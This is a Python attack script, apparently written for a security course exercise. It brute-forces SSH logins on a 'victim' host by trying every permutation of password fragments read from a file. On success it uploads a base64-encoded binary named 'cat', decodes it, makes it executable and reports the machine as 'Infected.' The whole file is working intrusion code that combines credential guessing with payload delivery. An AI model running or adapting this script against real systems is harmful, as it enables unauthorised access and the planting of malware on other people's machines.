#!/usr/bin/env python3
from itertools import combinations, permutations
from argparse import ArgumentParser
from base64 import b64encode
import colorama
import paramiko
import socket
import time


# initialize colorama
colorama.init()

GREEN = colorama.Fore.GREEN
RED = colorama.Fore.RED
RESET = colorama.Fore.RESET
BLUE = colorama.Fore.BLUE


def main():
    parser = ArgumentParser(description="SSH Bruteforce Python script.")
    parser.add_argument("victim", help="IP address of victim.")
    parser.add_argument('vars', nargs='*')

    # parse passed arguments
    args = parser.parse_args()
    host = args.victim

    client = task1(host)
    task2(client)


def task1(host):
    # read the file
    data = open('/home/csc2021/materials/victim.dat').read().splitlines()
    # brute-force
    for k in range(1, len(data) + 1):
        for comb in combinations(data, k):
            for perm in permutations(comb):
                client = try_ssh(host, 'csc2021', ''.join(perm))
                if client:
                    return client


def task2(client):
    with open('cat', 'rb') as f:
        b64 = b64encode(f.read())
    stdin, stdout, stderr = client.exec_command('base64 -d > cat')
    stdin.write(b64)
    client.exec_command('chmod +x cat')
    print(f'{BLUE}[*] Infected.{RESET}')
    pass


def try_ssh(hostname, username, password):
    # initialize SSH client
    client = paramiko.SSHClient()
    # add to know hosts
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=hostname, username=username,
                       password=password, timeout=3)
    except socket.timeout:
        # this is when host is unreachable
        print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
        return False
    except paramiko.AuthenticationException:
        print(f"[!] Invalid credentials for {username}:{password}")
        return False
    except paramiko.SSHException:
        print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
        time.sleep(10)
        return try_ssh(hostname, username, password)
    else:
        # connection was established successfully
        print(f"{GREEN}[+] Found combo: {username}:{password}{RESET}")
        return client


if __name__ == "__main__":
    main()
